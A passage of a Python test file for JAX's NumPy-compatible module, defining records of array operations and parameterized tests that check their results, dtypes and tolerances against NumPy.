op_record("cos", 1, number_dtypes, all_shapes, jtu.rand_default, ["rev"],
inexact=True),
op_record("tan", 1, number_dtypes, all_shapes,
partial(jtu.rand_uniform, low=-1.5, high=1.5), ["rev"],
inexact=True),
op_record("sinh", 1, number_dtypes, all_shapes, jtu.rand_default, ["rev"],
inexact=True),
op_record("cosh", 1, number_dtypes, all_shapes, jtu.rand_default, ["rev"],
inexact=True),
# TODO(b/142975473): on CPU, tanh for complex128 is only accurate to
# ~float32 precision.
# TODO(b/143135720): on GPU, tanh has only ~float32 precision.
op_record("tanh", 1, number_dtypes, all_shapes, jtu.rand_default, ["rev"],
tolerance={np.float64: 1e-7, np.complex128: 1e-7},
inexact=True),
op_record("arcsin", 1, number_dtypes, all_shapes, jtu.rand_small, ["rev"],
inexact=True),
op_record("arccos", 1, number_dtypes, all_shapes, jtu.rand_small, ["rev"],
inexact=True),
op_record("arctan", 1, number_dtypes, all_shapes, jtu.rand_small, ["rev"],
inexact=True),
op_record("arctan2", 2, float_dtypes, all_shapes, jtu.rand_small, ["rev"],
inexact=True),
op_record("arcsinh", 1, number_dtypes, all_shapes, jtu.rand_default, ["rev"],
inexact=True, tolerance={np.complex64: 2E-4, np.complex128: 2E-14}),
op_record("arccosh", 1, number_dtypes, all_shapes, jtu.rand_default, ["rev"],
inexact=True, tolerance={np.complex64: 2E-2, np.complex128: 2E-12}),
op_record("arctanh", 1, number_dtypes, all_shapes, jtu.rand_small, ["rev"],
inexact=True, tolerance={np.float64: 1e-9}),
]
JAX_COMPOUND_OP_RECORDS = [
# angle has inconsistent 32/64-bit return types across numpy versions.
op_record("angle", 1, number_dtypes, all_shapes, jtu.rand_default, [],
check_dtypes=False, inexact=True),
op_record("atleast_1d", 1, default_dtypes, all_shapes, jtu.rand_default, []),
op_record("atleast_2d", 1, default_dtypes, all_shapes, jtu.rand_default, []),
op_record("atleast_3d", 1, default_dtypes, all_shapes, jtu.rand_default, []),
op_record("cbrt", 1, default_dtypes, all_shapes, jtu.rand_some_inf, ["rev"],
inexact=True),
op_record("conjugate", 1, number_dtypes, all_shapes, jtu.rand_default, ["rev"]),
op_record("deg2rad", 1, float_dtypes, all_shapes, jtu.rand_default, []),
op_record("divide", 2, number_dtypes, all_shapes, jtu.rand_nonzero, ["rev"],
inexact=True),
op_record("divmod", 2, int_dtypes + float_dtypes, all_shapes,
jtu.rand_nonzero, []),
op_record("exp2", 1, number_dtypes, all_shapes, jtu.rand_default, ["rev"],
tolerance={jnp.bfloat16: 4e-2, np.float16: 1e-2}, inexact=True),
# TODO(b/142975473): on CPU, expm1 for float64 is only accurate to ~float32
# precision.
op_record("expm1", 1, number_dtypes, all_shapes, jtu.rand_positive, [],
test_name="expm1_large", tolerance={np.float64: 1e-8}, inexact=True),
op_record("expm1", 1, number_dtypes, all_shapes, jtu.rand_small_positive,
[], tolerance={np.float64: 1e-8}, inexact=True),
op_record("fix", 1, float_dtypes, all_shapes, jtu.rand_default, []),
op_record("fix", 1, int_dtypes + unsigned_dtypes, all_shapes,
jtu.rand_default, [], check_dtypes=False),
op_record("floor_divide", 2, number_dtypes, all_shapes,
jtu.rand_nonzero, ["rev"]),
op_record("floor_divide", 2, unsigned_dtypes, all_shapes,
jtu.rand_nonzero, ["rev"]),
op_record("fmin", 2, number_dtypes, all_shapes, jtu.rand_some_nan, []),
op_record("fmax", 2, number_dtypes, all_shapes, jtu.rand_some_nan, []),
op_record("fmod", 2, default_dtypes, all_shapes, jtu.rand_some_nan, []),
op_record("heaviside", 2, default_dtypes, all_shapes, jtu.rand_default, [],
inexact=True),
op_record("hypot", 2, default_dtypes, all_shapes, jtu.rand_default, [],
inexact=True),
op_record("kron", 2, number_dtypes, nonempty_shapes, jtu.rand_default, []),
op_record("outer", 2, number_dtypes, all_shapes, jtu.rand_default, []),
op_record("imag", 1, number_dtypes, all_shapes, jtu.rand_some_inf, []),
op_record("iscomplex", 1, number_dtypes, all_shapes, jtu.rand_some_inf, []),
op_record("isfinite", 1, inexact_dtypes, all_shapes, jtu.rand_some_inf_and_nan, []),
op_record("isinf", 1, inexact_dtypes, all_shapes, jtu.rand_some_inf_and_nan, []),
op_record("isnan", 1, inexact_dtypes, all_shapes, jtu.rand_some_inf_and_nan, []),
op_record("isneginf", 1, float_dtypes, all_shapes, jtu.rand_some_inf_and_nan, []),
op_record("isposinf", 1, float_dtypes, all_shapes, jtu.rand_some_inf_and_nan, []),
op_record("isreal", 1, number_dtypes, all_shapes, jtu.rand_some_inf, []),
op_record("isrealobj", 1, number_dtypes, all_shapes, jtu.rand_some_inf, []),
op_record("log2", 1, number_dtypes, all_shapes, jtu.rand_positive, ["rev"],
inexact=True),
op_record("log10", 1, number_dtypes, all_shapes, jtu.rand_positive, ["rev"],
inexact=True),
op_record("log1p", 1, number_dtypes, all_shapes, jtu.rand_positive, [],
test_name="log1p_large", tolerance={np.float64: 1e-12},
inexact=True),
op_record("log1p", 1, number_dtypes, all_shapes, jtu.rand_small_positive, [],
tolerance={np.float64: 1e-12}, inexact=True),
op_record("logaddexp", 2, float_dtypes, all_shapes,
jtu.rand_some_inf_and_nan, ["rev"],
tolerance={np.float64: 1e-12}, inexact=True),
op_record("logaddexp2", 2, float_dtypes, all_shapes,
jtu.rand_some_inf_and_nan, ["rev"],
tolerance={np.float16: 1e-2, np.float64: 2e-14}, inexact=True),
op_record("polyval", 2, number_dtypes, nonempty_nonscalar_array_shapes,
jtu.rand_default, [], check_dtypes=False,
tolerance={dtypes.bfloat16: 4e-2, np.float16: 1e-2,
np.float64: 1e-12}),
op_record("positive", 1, number_dtypes, all_shapes, jtu.rand_default, ["rev"]),
op_record("power", 2, number_dtypes, all_shapes, jtu.rand_positive, ["rev"],
tolerance={np.complex128: 1e-14}, check_dtypes=False),
op_record("rad2deg", 1, float_dtypes, all_shapes, jtu.rand_default, []),
op_record("ravel", 1, all_dtypes, all_shapes, jtu.rand_default, ["rev"]),
op_record("real", 1, number_dtypes, all_shapes, jtu.rand_some_inf, []),
op_record("remainder", 2, default_dtypes, all_shapes, jtu.rand_nonzero, [],
tolerance={np.float16: 1e-2}),
op_record("mod", 2, default_dtypes, all_shapes, jtu.rand_nonzero, []),
op_record("modf", 1, float_dtypes, all_shapes, jtu.rand_default, []),
op_record("modf", 1, int_dtypes + unsigned_dtypes, all_shapes,
jtu.rand_default, [], check_dtypes=False),
op_record("rint", 1, inexact_dtypes, all_shapes, jtu.rand_some_inf_and_nan,
[]),
op_record("rint", 1, int_dtypes + unsigned_dtypes, all_shapes,
jtu.rand_default, [], check_dtypes=False),
op_record("sign", 1, number_dtypes + unsigned_dtypes,
all_shapes, jtu.rand_some_inf_and_nan, []),
# numpy 1.16 has trouble mixing uint and bfloat16, so we test these separately.
op_record("copysign", 2, default_dtypes,
all_shapes, jtu.rand_some_inf_and_nan, [], check_dtypes=False),
op_record("copysign", 2, unsigned_dtypes,
all_shapes, jtu.rand_some_inf_and_nan, [], check_dtypes=False),
op_record("sinc", 1, [t for t in number_dtypes if t != jnp.bfloat16],
all_shapes, jtu.rand_default, ["rev"],
tolerance={np.complex64: 1e-5}, inexact=True,
check_dtypes=False),
op_record("square", 1, number_dtypes, all_shapes, jtu.rand_default, ["rev"]),
op_record("sqrt", 1, number_dtypes, all_shapes, jtu.rand_positive, ["rev"],
inexact=True),
op_record("transpose", 1, all_dtypes, all_shapes, jtu.rand_default, ["rev"],
check_dtypes=False),
op_record("true_divide", 2, all_dtypes, all_shapes, jtu.rand_nonzero,
["rev"], inexact=True),
op_record("ediff1d", 3, [np.int32], all_shapes, jtu.rand_default, []),
# TODO(phawkins): np.unwrap does not correctly promote its default period
# argument under NumPy 1.21 for bfloat16 inputs. It works fine if we
# explicitly pass a bfloat16 value that does not need promition. We should
# probably add a custom test harness for unwrap that tests the period
# argument anyway.
op_record("unwrap", 1, [t for t in float_dtypes if t != dtypes.bfloat16],
nonempty_nonscalar_array_shapes,
jtu.rand_default, ["rev"],
# numpy.unwrap always returns float64
check_dtypes=False,
# numpy cumsum is inaccurate, see issue #3517
tolerance={dtypes.bfloat16: 1e-1, np.float16: 1e-1}),
op_record("isclose", 2, [t for t in all_dtypes if t != jnp.bfloat16],
all_shapes, jtu.rand_small_positive, []),
op_record("gcd", 2, int_dtypes_no_uint64, all_shapes, jtu.rand_default, []),
op_record("lcm", 2, int_dtypes_no_uint64, all_shapes, jtu.rand_default, []),
]
JAX_BITWISE_OP_RECORDS = [
op_record("bitwise_and", 2, int_dtypes + unsigned_dtypes, all_shapes,
jtu.rand_bool, []),
op_record("bitwise_not", 1, int_dtypes + unsigned_dtypes, all_shapes,
jtu.rand_bool, []),
op_record("invert", 1, int_dtypes + unsigned_dtypes, all_shapes,
jtu.rand_bool, []),
op_record("bitwise_or", 2, int_dtypes + unsigned_dtypes, all_shapes,
jtu.rand_bool, []),
op_record("bitwise_xor", 2, int_dtypes + unsigned_dtypes, all_shapes,
jtu.rand_bool, []),
]
JAX_REDUCER_RECORDS = [
op_record("mean", 1, number_dtypes, nonempty_shapes, jtu.rand_default, [],
inexact=True),
op_record("prod", 1, all_dtypes, all_shapes, jtu.rand_small_positive, []),
op_record("sum", 1, all_dtypes, all_shapes, jtu.rand_default, []),
op_record("nanmean", 1, inexact_dtypes, nonempty_shapes, jtu.rand_some_nan,
[], inexact=True),
op_record("nanprod", 1, all_dtypes, all_shapes, jtu.rand_some_nan, []),
op_record("nansum", 1, number_dtypes, all_shapes, jtu.rand_some_nan, []),
]
JAX_REDUCER_INITIAL_RECORDS = [
op_record("prod", 1, all_dtypes, all_shapes, jtu.rand_small_positive, []),
op_record("sum", 1, all_dtypes, all_shapes, jtu.rand_default, []),
op_record("max", 1, all_dtypes, all_shapes, jtu.rand_default, []),
op_record("min", 1, all_dtypes, all_shapes, jtu.rand_default, []),
]
JAX_REDUCER_WHERE_NO_INITIAL_RECORDS = [
op_record("all", 1, bool_dtypes, all_shapes, jtu.rand_some_zero, []),
op_record("any", 1, bool_dtypes, all_shapes, jtu.rand_some_zero, []),
op_record("mean", 1, all_dtypes, nonempty_shapes, jtu.rand_default, [],
inexact=True),
op_record("var", 1, all_dtypes, nonempty_shapes, jtu.rand_default, [],
inexact=True),
op_record("std", 1, all_dtypes, nonempty_shapes, jtu.rand_default, [],
inexact=True),
]
JAX_REDUCER_NO_DTYPE_RECORDS = [
op_record("all", 1, all_dtypes, all_shapes, jtu.rand_some_zero, []),
op_record("any", 1, all_dtypes, all_shapes, jtu.rand_some_zero, []),
op_record("max", 1, all_dtypes, nonempty_shapes, jtu.rand_default, []),
op_record("min", 1, all_dtypes, nonempty_shapes, jtu.rand_default, []),
op_record("var", 1, all_dtypes, nonempty_shapes, jtu.rand_default, [],
inexact=True),
op_record("std", 1, all_dtypes, nonempty_shapes, jtu.rand_default, [],
inexact=True),
op_record("nanmax", 1, all_dtypes, nonempty_shapes, jtu.rand_some_nan, []),
op_record("nanmin", 1, all_dtypes, nonempty_shapes, jtu.rand_some_nan, []),
op_record("nanvar", 1, all_dtypes, nonempty_shapes, jtu.rand_some_nan,
[], inexact=True),
op_record("nanstd", 1, all_dtypes, nonempty_shapes, jtu.rand_some_nan,
[], inexact=True),
op_record("ptp", 1, number_dtypes, nonempty_shapes, jtu.rand_default, []),
]
JAX_ARGMINMAX_RECORDS = [
op_record("argmin", 1, default_dtypes, nonempty_shapes, jtu.rand_some_equal, []),
op_record("argmax", 1, default_dtypes, nonempty_shapes, jtu.rand_some_equal, []),
op_record("nanargmin", 1, default_dtypes, nonempty_shapes, jtu.rand_some_nan, []),
op_record("nanargmax", 1, default_dtypes, nonempty_shapes, jtu.rand_some_nan, []),
]
JAX_OPERATOR_OVERLOADS = [
op_record("__add__", 2, number_dtypes, all_shapes, jtu.rand_default, []),
op_record("__sub__", 2, number_dtypes, all_shapes, jtu.rand_default, []),
op_record("__mul__", 2, number_dtypes, all_shapes, jtu.rand_default, []),
op_record("__eq__", 2, number_dtypes, all_shapes, jtu.rand_default, []),
op_record("__ne__", 2, number_dtypes, all_shapes, jtu.rand_default, []),
op_record("__lt__", 2, default_dtypes, all_shapes, jtu.rand_default, []),
op_record("__le__", 2, default_dtypes, all_shapes, jtu.rand_default, []),
op_record("__gt__", 2, default_dtypes, all_shapes, jtu.rand_default, []),
op_record("__ge__", 2, default_dtypes, all_shapes, jtu.rand_default, []),
op_record("__pos__", 1, number_dtypes, all_shapes, jtu.rand_default, []),
op_record("__neg__", 1, number_dtypes, all_shapes, jtu.rand_default, []),
op_record("__pow__", 2, inexact_dtypes, all_shapes, jtu.rand_positive, [],
tolerance={np.float32: 2e-4, np.complex64: 2e-4, np.complex128: 1e-14}),
op_record("__mod__", 2, default_dtypes, all_shapes, jtu.rand_nonzero, [],
tolerance={np.float16: 1e-1}),
op_record("__floordiv__", 2, default_dtypes, all_shapes,
jtu.rand_nonzero, []),
op_record("__truediv__", 2, number_dtypes, all_shapes, jtu.rand_nonzero, [],
inexact=True),
op_record("__abs__", 1, number_dtypes, all_shapes, jtu.rand_default, []),
# TODO(mattjj): __invert__ fails on bool dtypes because ~True == -2
op_record("__invert__", 1, int_dtypes, all_shapes, jtu.rand_default, []),
# TODO(mattjj): investigate these failures
# op_record("__or__", 2, number_dtypes, all_shapes, jtu.rand_bool, []),
# op_record("__and__", 2, number_dtypes, all_shapes, jtu.rand_default, []),
# op_record("__xor__", 2, number_dtypes, all_shapes, jtu.rand_bool, []),
# op_record("__divmod__", 2, number_dtypes, all_shapes, jtu.rand_nonzero, []),
op_record("__lshift__", 2, int_dtypes_no_uint64, all_shapes, partial(jtu.rand_int, high=8), []),
op_record("__rshift__", 2, int_dtypes_no_uint64, all_shapes, partial(jtu.rand_int, high=8), []),
]
JAX_RIGHT_OPERATOR_OVERLOADS = [
op_record("__radd__", 2, number_dtypes, all_shapes, jtu.rand_default, []),
op_record("__rsub__", 2, number_dtypes, all_shapes, jtu.rand_default, []),
op_record("__rmul__", 2, number_dtypes, all_shapes, jtu.rand_default, []),
op_record("__rpow__", 2, inexact_dtypes, all_shapes, jtu.rand_positive, [],
tolerance={np.float32: 2e-4, np.complex64: 1e-3}),
op_record("__rmod__", 2, default_dtypes, all_shapes, jtu.rand_nonzero, [],
tolerance={np.float16: 1e-1}),
op_record("__rfloordiv__", 2, default_dtypes, all_shapes,
jtu.rand_nonzero, []),
op_record("__rtruediv__", 2, number_dtypes, all_shapes, jtu.rand_nonzero, [],
inexact=True),
# op_record("__ror__", 2, number_dtypes, all_shapes, jtu.rand_bool, []),
# op_record("__rand__", 2, number_dtypes, all_shapes, jtu.rand_default, []),
# op_record("__rxor__", 2, number_dtypes, all_shapes, jtu.rand_bool, []),
# op_record("__rdivmod__", 2, number_dtypes, all_shapes, jtu.rand_nonzero, []),
op_record("__rlshift__", 2, int_dtypes_no_uint64, all_shapes, partial(jtu.rand_int, high=8), []),
op_record("__rrshift__", 2, int_dtypes_no_uint64, all_shapes, partial(jtu.rand_int, high=8), [])
]
class _OverrideEverything(object):
pass
for rec in JAX_OPERATOR_OVERLOADS + JAX_RIGHT_OPERATOR_OVERLOADS:
if rec.nargs == 2:
setattr(_OverrideEverything, rec.name, lambda self, other: self)
class _OverrideNothing(object):
pass
for rec in JAX_OPERATOR_OVERLOADS + JAX_RIGHT_OPERATOR_OVERLOADS:
if rec.nargs == 2:
setattr(_OverrideNothing, rec.name, lambda self, other: NotImplemented)
def _dtypes_are_compatible_for_bitwise_ops(args):
if len(args) <= 1:
return True
is_signed = lambda dtype: jnp.issubdtype(dtype, np.signedinteger)
width = lambda dtype: jnp.iinfo(dtype).bits
x, y = args
if width(x) > width(y):
x, y = y, x
# The following condition seems a little ad hoc, but seems to capture what
# numpy actually implements.
return (
is_signed(x) == is_signed(y)
or (width(x) == 32 and width(y) == 32)
or (width(x) == 32 and width(y) == 64 and is_signed(y)))
def _shapes_are_broadcast_compatible(shapes):
accumulator = np.zeros([])
for shape in shapes:
try:
accumulator = accumulator + np.zeros(shape)
except ValueError:
return False
return True
def _shapes_are_equal_length(shapes):
return all(len(shape) == len(shapes[0]) for shape in shapes[1:])
def _promote_like_jnp(fun, inexact=False):
"""Decorator that promotes the arguments of `fun` to `jnp.result_type(*args)`.
jnp and np have different type promotion semantics; this decorator allows
tests make an np reference implementation act more like an jnp
implementation.
"""
def wrapper(*args, **kw):
flat_args = tree_util.tree_leaves(args)
if inexact and not any(jnp.issubdtype(jnp.result_type(x), jnp.inexact)
for x in flat_args):
dtype = jnp.result_type(jnp.float_, *flat_args)
else:
dtype = jnp.result_type(*flat_args)
args = tree_util.tree_map(lambda a: np.asarray(a, dtype), args)
return fun(*args, **kw)
return wrapper
@jtu.with_config(jax_numpy_rank_promotion="raise")
class LaxBackedNumpyTests(jtu.JaxTestCase):
"""Tests for LAX-backed Numpy implementation."""
def _GetArgsMaker(self, rng, shapes, dtypes, np_arrays=True):
def f():
out = [rng(shape, dtype or jnp.float_)
for shape, dtype in zip(shapes, dtypes)]
if np_arrays:
return out
return [jnp.asarray(a) if isinstance(a, (np.ndarray, np.generic)) else a
for a in out]
return f
def testNotImplemented(self):
for name in jnp._NOT_IMPLEMENTED:
func = getattr(jnp, name)
with self.assertRaises(NotImplementedError):
func()
@parameterized.named_parameters(itertools.chain.from_iterable(
jtu.cases_from_list(
{"testcase_name": jtu.format_test_name_suffix(rec.test_name, shapes,
dtypes),
"rng_factory": rec.rng_factory, "shapes": shapes, "dtypes": dtypes,
"np_op": getattr(np, rec.name), "jnp_op": getattr(jnp, rec.name),
"check_dtypes": rec.check_dtypes, "tolerance": rec.tolerance,
"inexact": rec.inexact}
for shapes in filter(
_shapes_are_broadcast_compatible,
itertools.combinations_with_replacement(rec.shapes, rec.nargs))
for dtypes in itertools.product(
*(_valid_dtypes_for_shape(s, rec.dtypes) for s in shapes)))
for rec in itertools.chain(JAX_ONE_TO_ONE_OP_RECORDS,
JAX_COMPOUND_OP_RECORDS)))
@jax.numpy_rank_promotion('allow') # This test explicitly exercises implicit rank promotion.
def testOp(self, np_op, jnp_op, rng_factory, shapes, dtypes, check_dtypes,
tolerance, inexact):
np_op = jtu.ignore_warning(category=RuntimeWarning,
message="invalid value.*")(np_op)
np_op = jtu.ignore_warning(category=RuntimeWarning,
message="divide by zero.*")(np_op)
rng = rng_factory(self.rng())
args_maker = self._GetArgsMaker(rng, shapes, dtypes, np_arrays=False)
tol = max(jtu.tolerance(dtype, tolerance) for dtype in dtypes)
tol = functools.reduce(jtu.join_tolerance,
[tolerance, tol, jtu.default_tolerance()])
self._CheckAgainstNumpy(_promote_like_jnp(np_op, inexact), jnp_op,
args_maker, check_dtypes=check_dtypes, tol=tol)
self._CompileAndCheck(jnp_op, args_maker, check_dtypes=check_dtypes,
atol=tol, rtol=tol)
@parameterized.named_parameters(itertools.chain.from_iterable(
jtu.cases_from_list(
{"testcase_name": jtu.format_test_name_suffix(rec.test_name, shapes,
dtypes),
"rng_factory": rec.rng_factory, "shapes": shapes, "dtypes": dtypes, "name": rec.name,
"tol": rec.tolerance}
for shapes in filter(
_shapes_are_broadcast_compatible,
itertools.combinations_with_replacement(rec.shapes, rec.nargs))
for dtypes in itertools.product(
*(_valid_dtypes_for_shape(s, rec.dtypes) for s in shapes)))
for rec in JAX_OPERATOR_OVERLOADS))
@jax.numpy_rank_promotion('allow') # This test explicitly exercises implicit rank promotion.
def testOperatorOverload(self, name, rng_factory, shapes, dtypes, tol):
rng = rng_factory(self.rng())
# np and jnp arrays have different type promotion rules; force the use of
# jnp arrays.
args_maker = self._GetArgsMaker(rng, shapes, dtypes, np_arrays=False)
fun = lambda *xs: getattr(operator, name.strip('_'))(*xs)
self._CompileAndCheck(fun, args_maker, atol=tol, rtol=tol)
@parameterized.named_parameters(itertools.chain.from_iterable(
jtu.cases_from_list(
{"testcase_name": jtu.format_test_name_suffix(rec.test_name, shapes,
dtypes),
"rng_factory": rec.rng_factory, "shapes": shapes, "dtypes": dtypes, "name": rec.name,
"op_tolerance": rec.tolerance}
for shapes in filter(
_shapes_are_broadcast_compatible,
itertools.combinations_with_replacement(rec.shapes, rec.nargs))
for dtypes in itertools.product(
*(_valid_dtypes_for_shape(s, rec.dtypes) for s in shapes)))
for rec in JAX_RIGHT_OPERATOR_OVERLOADS))
@jax.numpy_rank_promotion('allow') # This test explicitly exercises implicit rank promotion.
def testRightOperatorOverload(self, name, rng_factory, shapes, dtypes,
op_tolerance):
if shapes[1] is jtu.PYTHON_SCALAR_SHAPE:
raise SkipTest("scalars not implemented") # TODO(mattjj): clean up
rng = rng_factory(self.rng())
args_maker = self._GetArgsMaker(rng, shapes, dtypes, np_arrays=False)
fun = lambda fst, snd: getattr(snd, name)(fst)
tol = max(jtu.tolerance(dtype, op_tolerance) for dtype in dtypes)
self._CompileAndCheck( fun, args_maker, atol=tol, rtol=tol)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": rec.test_name + "_{}".format(dtype),
"rng_factory": rec.rng_factory,
"op_name": rec.name, "dtype": dtype}
for rec in JAX_OPERATOR_OVERLOADS if rec.nargs == 2
for dtype in rec.dtypes))
def testBinaryOperatorDefers(self, op_name, rng_factory, dtype):
rng = rng_factory(self.rng())
arg = jax.device_put(rng((), dtype))
op = getattr(operator, op_name)
other = _OverrideEverything()
assert op(other, arg) is other
assert op(arg, other) is other
other = _OverrideNothing()
if op_name == "__eq__":
assert op(other, arg) is False
assert op(arg, other) is False
elif op_name == "__ne__":
assert op(other, arg) is True
assert op(arg, other) is True
else:
with self.assertRaises(TypeError):
op(other, arg)
with self.assertRaises(TypeError):
op(arg, other)
def testArrayEqualExamples(self):
# examples from the array_equal() docstring.
self.assertTrue(jnp.array_equal([1, 2], [1, 2]))
self.assertTrue(jnp.array_equal(np.array([1, 2]), np.array([1, 2])))
self.assertFalse(jnp.array_equal([1, 2], [1, 2, 3]))
self.assertFalse(jnp.array_equal([1, 2], [1, 4]))
a = np.array([1, np.nan])
self.assertFalse(jnp.array_equal(a, a))
self.assertTrue(jnp.array_equal(a, a, equal_nan=True))
a = np.array([1 + 1j])
b = a.copy()
a.real = np.nan
b.imag = np.nan
self.assertTrue(jnp.array_equal(a, b, equal_nan=True))
def testArrayEquivExamples(self):
# examples from the array_equiv() docstring.
self.assertTrue(jnp.array_equiv([1, 2], [1, 2]))
self.assertFalse(jnp.array_equiv([1, 2], [1, 3]))
with jax.numpy_rank_promotion('allow'):
self.assertTrue(jnp.array_equiv([1, 2], [[1, 2], [1, 2]]))
self.assertFalse(jnp.array_equiv([1, 2], [[1, 2, 1, 2], [1, 2, 1, 2]]))
self.assertFalse(jnp.array_equiv([1, 2], [[1, 2], [1, 3]]))
def testArrayModule(self):
if numpy_dispatch is None:
raise SkipTest('requires https://github.com/seberg/numpy-dispatch')
jnp_array = jnp.array(1.0)
np_array = np.array(1.0)
module = numpy_dispatch.get_array_module(jnp_array)
self.assertIs(module, jnp)
module = numpy_dispatch.get_array_module(jnp_array, np_array)
self.assertIs(module, jnp)
def f(x):
module = numpy_dispatch.get_array_module(x)
self.assertIs(module, jnp)
return x
jax.jit(f)(jnp_array)
jax.grad(f)(jnp_array)
@parameterized.named_parameters(itertools.chain.from_iterable(
jtu.cases_from_list(
{"testcase_name": jtu.format_test_name_suffix(
rec.test_name, shapes, dtypes),
"rng_factory": rec.rng_factory, "shapes": shapes, "dtypes": dtypes,
"np_op": getattr(np, rec.name), "jnp_op": getattr(jnp, rec.name)}
for shapes in filter(
_shapes_are_broadcast_compatible,
itertools.combinations_with_replacement(rec.shapes, rec.nargs))
for dtypes in filter(
_dtypes_are_compatible_for_bitwise_ops,
itertools.combinations_with_replacement(rec.dtypes, rec.nargs)))
for rec in JAX_BITWISE_OP_RECORDS))
@jax.numpy_rank_promotion('allow') # This test explicitly exercises implicit rank promotion.
def testBitwiseOp(self, np_op, jnp_op, rng_factory, shapes, dtypes):
rng = rng_factory(self.rng())
if not config.x64_enabled and any(
jnp.iinfo(dtype).bits == 64 for dtype in dtypes):
self.skipTest("x64 types are disabled by jax_enable_x64")
args_maker = self._GetArgsMaker(rng, shapes, dtypes)
self._CheckAgainstNumpy(np_op, jnp_op, args_maker,
check_dtypes=jtu.PYTHON_SCALAR_SHAPE not in shapes)
self._CompileAndCheck(jnp_op, args_maker)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": jtu.format_test_name_suffix(op.__name__, shapes, dtypes),
"op": op, "dtypes": dtypes, "shapes": shapes}
for op in [jnp.left_shift, jnp.right_shift]
for shapes in filter(
_shapes_are_broadcast_compatible,
# TODO numpy always promotes to shift dtype for zero-dim shapes:
itertools.combinations_with_replacement(nonzerodim_shapes, 2))
for dtypes in itertools.product(
*(_valid_dtypes_for_shape(s, int_dtypes_no_uint64) for s in shapes))))
@jax.numpy_rank_promotion('allow') # This test explicitly exercises implicit rank promotion.
def testShiftOpAgainstNumpy(self, op, dtypes, shapes):
dtype, shift_dtype = dtypes
signed_mix = np.issubdtype(dtype, np.signedinteger) != \
np.issubdtype(shift_dtype, np.signedinteger)
has_32 = any(np.iinfo(d).bits == 32 for d in dtypes)
promoting_to_64 = has_32 and signed_mix
if promoting_to_64 and not config.x64_enabled:
self.skipTest("np.right_shift/left_shift promoting to int64"
"differs from jnp in 32 bit mode.")
info, shift_info = map(np.iinfo, dtypes)
x_rng = jtu.rand_int(self.rng(), low=info.min, high=info.max + 1)
# NumPy requires shifts to be non-negative and below the bit width:
shift_rng = jtu.rand_int(self.rng(), high=max(info.bits, shift_info.bits))
args_maker = lambda: (x_rng(shapes[0], dtype), shift_rng(shapes[1], shift_dtype))
self._CompileAndCheck(op, args_maker)
np_op = getattr(np, op.__name__)
self._CheckAgainstNumpy(np_op, op, args_maker)
@parameterized.named_parameters(itertools.chain.from_iterable(
jtu.cases_from_list(
{"testcase_name": "{}_inshape={}_axis={}_dtype={}_keepdims={}".format(
rec.test_name.capitalize(),
jtu.format_shape_dtype_string(shape, dtype), axis,
"None" if out_dtype is None else np.dtype(out_dtype).name, keepdims),
"rng_factory": rec.rng_factory, "shape": shape, "dtype": dtype, "out_dtype": out_dtype,
"np_op": getattr(np, rec.name), "jnp_op": getattr(jnp, rec.name),
"axis": axis, "keepdims": keepdims, "inexact": rec.inexact}
for shape in rec.shapes for dtype in rec.dtypes
for out_dtype in [None] + rec.dtypes
for axis in list(range(-len(shape), len(shape))) + [None]
for keepdims in [False, True])
for rec in JAX_REDUCER_RECORDS))
def testReducer(self, np_op, jnp_op, rng_factory, shape, dtype, out_dtype,
axis, keepdims, inexact):
rng = rng_factory(self.rng())
@jtu.ignore_warning(category=np.ComplexWarning)
@jtu.ignore_warning(category=RuntimeWarning,
message="mean of empty slice.*")
@jtu.ignore_warning(category=RuntimeWarning,
message="overflow encountered.*")
def np_fun(x):
x_cast = x if dtype != jnp.bfloat16 else x.astype(np.float32)
t = out_dtype if out_dtype != jnp.bfloat16 else np.float32
return np_op(x_cast, axis, dtype=t, keepdims=keepdims)
np_fun = _promote_like_jnp(np_fun, inexact)
jnp_fun = lambda x: jnp_op(x, axis, dtype=out_dtype, keepdims=keepdims)
jnp_fun = jtu.ignore_warning(category=jnp.ComplexWarning)(jnp_fun)
args_maker = lambda: [rng(shape, dtype)]
tol_spec = {np.float16: 1e-2, np.int32: 1E-3, np.float32: 1e-3,
np.complex64: 1e-3, np.float64: 1e-5, np.complex128: 1e-5}
tol = jtu.tolerance(dtype, tol_spec)
tol = max(tol, jtu.tolerance(out_dtype, tol_spec)) if out_dtype else tol
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker,
check_dtypes=jnp.bfloat16 not in (dtype, out_dtype),
tol=tol)
self._CompileAndCheck(jnp_fun, args_maker, atol=tol,
rtol=tol)
@parameterized.named_parameters(itertools.chain.from_iterable(
jtu.cases_from_list(
{"testcase_name": "{}_inshape={}_axis={}_keepdims={}".format(
rec.test_name.capitalize(),
jtu.format_shape_dtype_string(shape, dtype), axis, keepdims),
"rng_factory": rec.rng_factory, "shape": shape, "dtype": dtype,
"np_op": getattr(np, rec.name), "jnp_op": getattr(jnp, rec.name),
"axis": axis, "keepdims": keepdims, "inexact": rec.inexact}
for shape in rec.shapes for dtype in rec.dtypes
for axis in list(range(-len(shape), len(shape))) + [None]
for keepdims in [False, True])
for rec in JAX_REDUCER_NO_DTYPE_RECORDS))
def testReducerNoDtype(self, np_op, jnp_op, rng_factory, shape, dtype, axis,
keepdims, inexact):
rng = rng_factory(self.rng())
is_bf16_nan_test = dtype == jnp.bfloat16 and rng_factory.__name__ == 'rand_some_nan'
@jtu.ignore_warning(category=RuntimeWarning,
message="Degrees of freedom <= 0 for slice.*")
@jtu.ignore_warning(category=RuntimeWarning,
message="All-NaN slice encountered.*")
def np_fun(x):
x_cast = x if not is_bf16_nan_test else x.astype(np.float32)
res = np_op(x_cast, axis, keepdims=keepdims)
res = res if not is_bf16_nan_test else res.astype(jnp.bfloat16)
return res
np_fun = _promote_like_jnp(np_fun, inexact)
jnp_fun = lambda x: jnp_op(x, axis, keepdims=keepdims)
args_maker = lambda: [rng(shape, dtype)]
tol = {np.float16: 0.002}
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker, tol=tol)
self._CompileAndCheck(jnp_fun, args_maker, rtol=tol, atol=tol)
@parameterized.named_parameters(itertools.chain.from_iterable(
jtu.cases_from_list(
{"testcase_name": "{}_inshape={}_axis={}_keepdims={}_initial={}".format(
rec.test_name.capitalize(),
jtu.format_shape_dtype_string(shape, dtype), axis, keepdims, initial),
"rng_factory": rec.rng_factory, "shape": shape, "dtype": dtype,
"np_op": getattr(np, rec.name), "jnp_op": getattr(jnp, rec.name),
"initial": initial, "axis": axis, "keepdims": keepdims, "inexact": rec.inexact}
